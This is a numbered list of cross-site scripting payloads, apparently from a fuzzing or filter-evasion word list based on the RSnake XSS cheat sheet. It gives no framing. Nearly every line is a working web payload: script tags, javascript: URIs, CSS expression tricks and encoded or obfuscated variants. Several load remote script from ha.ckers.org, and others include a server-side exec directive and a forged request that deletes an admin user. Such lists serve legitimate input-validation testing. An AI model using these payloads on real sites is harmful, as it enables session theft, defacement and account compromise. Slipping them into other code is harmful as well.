LOL
172 | LOL
173 |
174 |
LOL
175 | <SCRIPT>alert(/XSS/.source)</SCRIPT>
176 | \\";alert('XSS');//
177 | </TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>
178 | <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
179 | <BODY BACKGROUND=\"javascript:alert('XSS')\">
180 | <BODY ONLOAD=alert('XSS')>
181 | <IMG DYNSRC=\"javascript:alert('XSS')\">
182 | <IMG LOWSRC=\"javascript:alert('XSS')\">
183 | <BGSOUND SRC=\"javascript:alert('XSS');\">
184 | <BR SIZE=\"&{alert('XSS')}\">
185 | <LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>
186 | <LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">
187 | <LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">
188 | <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
189 | <META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">
190 | <STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>
191 | <XSS STYLE=\"behavior: url(xss.htc);\">
192 | <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
193 | <IMG SRC='vbscript:msgbox(\"XSS\")'>
194 | <IMG SRC=\"mocha:[code]\">
195 | <IMG SRC=\"livescript:[code]\">
196 | �scriptualert(EXSSE)�/scriptu
197 | <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
198 | <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">
199 | <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"
200 | <IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
201 | <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
202 | <TABLE BACKGROUND=\"javascript:alert('XSS')\">
203 | <TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">
204 | <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
205 | <DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">
206 | <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
207 | <DIV STYLE=\"width: expression(alert('XSS'));\">
208 | <STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>
209 | <IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">
210 | <XSS STYLE=\"xss:expression(alert('XSS'))\">
211 | exp/*<A STYLE='no\xss:noxss(\"*//*\");
212 | xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>
213 | <STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>
214 | <STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>
215 | <STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>
216 | <!--[if gte IE 4]>
217 | <SCRIPT>alert('XSS');</SCRIPT>
218 | <![endif]-->
219 | <BASE HREF=\"javascript:alert('XSS');//\">
220 | <OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>
221 | <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
222 | <EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>
223 | <EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>
224 | a=\"get\";
225 | b=\"URL(\\"\";
226 | c=\"javascript:\";
227 | d=\"alert('XSS');\\")\";
228 | eval(a+b+c+d);
229 | <HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>
230 | <XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>
231 | </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
232 | <XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML>
233 | <SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>
234 | <XML SRC=\"xsstest.xml\" ID=I></XML>
235 | <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
236 | <HTML><BODY>
237 | <?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">
238 | <?import namespace=\"t\" implementation=\"#default#time2\">
239 | <t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\">
240 | </BODY></HTML>
241 | <SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>
242 | <!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->
243 | <? echo('<SCR)';
244 | echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>
245 | <IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">
246 | Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
247 | <META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">
248 | <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
249 | <SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
250 | <SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
251 | <SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
252 | <SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
253 | <SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
254 | <SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
255 | <SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
256 | <A HREF=\"http://66.102.7.147/\">XSS</A>
257 | <A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>
258 | <A HREF=\"http://1113982867/\">XSS</A>
259 | <A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>
260 | <A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>
261 | <A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A>
262 | <A HREF=\"//www.google.com/\">XSS</A>
263 | <A HREF=\"//google\">XSS</A>
264 | <A HREF=\"http://ha.ckers.org@google\">XSS</A>
265 | <A HREF=\"http://google:ha.ckers.org\">XSS</A>
266 | <A HREF=\"http://google.com/\">XSS</A>
267 | <A HREF=\"http://www.google.com./\">XSS</A>
268 | <A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>
269 | <A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>
270 | <
271 | %3C
272 | <
273 | <
274 | <
275 | <
276 | <
277 | <
278 | <
279 | <
280 | <
281 | <
282 | <
283 | <
284 | <
285 | <
286 | <
287 | <
288 | <
289 | <
290 | <
291 | <
292 | <
293 | <
294 | <
295 | <
296 | <
297 | <
298 | <
299 | <
300 | <
301 | <
302 | <
303 | <
304 | <
305 | <
306 | <
307 | <
308 | <
309 | <
310 | <
311 | <
312 | <
313 | <
314 | <
315 | <
316 | <
317 | <
318 | <
319 | <
320 | <
321 | <
322 | <
323 | <
324 | <
325 | <
326 | <
327 | <
328 | <
329 | <
330 | <
331 | \x3c
332 | \x3C
333 | \u003c
334 | \u003C
335 | <iframe src=http://ha.ckers.org/scriptlet.html>
336 | <IMG SRC=\"javascript:alert('XSS')\"
337 | <SCRIPT SRC=//ha.ckers.org/.js>
338 | <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
339 | <<SCRIPT>alert(\"XSS\");//<</SCRIPT>
340 | <SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
341 | <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>
342 | <SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
343 | <IMG SRC=\" javascript:alert('XSS');\">
344 | perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out
345 | perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out
346 | <IMG SRC=\"jav
ascript:alert('XSS');\">
347 | <IMG SRC=\"jav
ascript:alert('XSS');\">
348 | <IMG SRC=\"jav ascript:alert('XSS');\">
349 | <IMG SRC=javascript:alert('XSS')>
350 | <IMG SRC=javascript:alert('XSS')>
351 | <IMG SRC=javascript:alert('XSS')>
352 | <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
353 | <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
354 | <IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>
355 | <IMG SRC=javascript:alert("XSS")>
356 | <IMG SRC=JaVaScRiPt:alert('XSS')>
357 | <IMG SRC=javascript:alert('XSS')>
358 | <IMG SRC=\"javascript:alert('XSS');\">
359 | <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
360 | '';!--\"<XSS>=&{()}
361 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
362 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>
363 | '';!--"
=&{()}
364 |
365 |
366 |
367 |
368 |
369 | ">
370 |
371 |
372 |
373 | <
374 |
375 | \";alert('XSS');//
376 |
377 | �script�alert(�XSS�)�/script�
378 |
379 |
380 |
381 |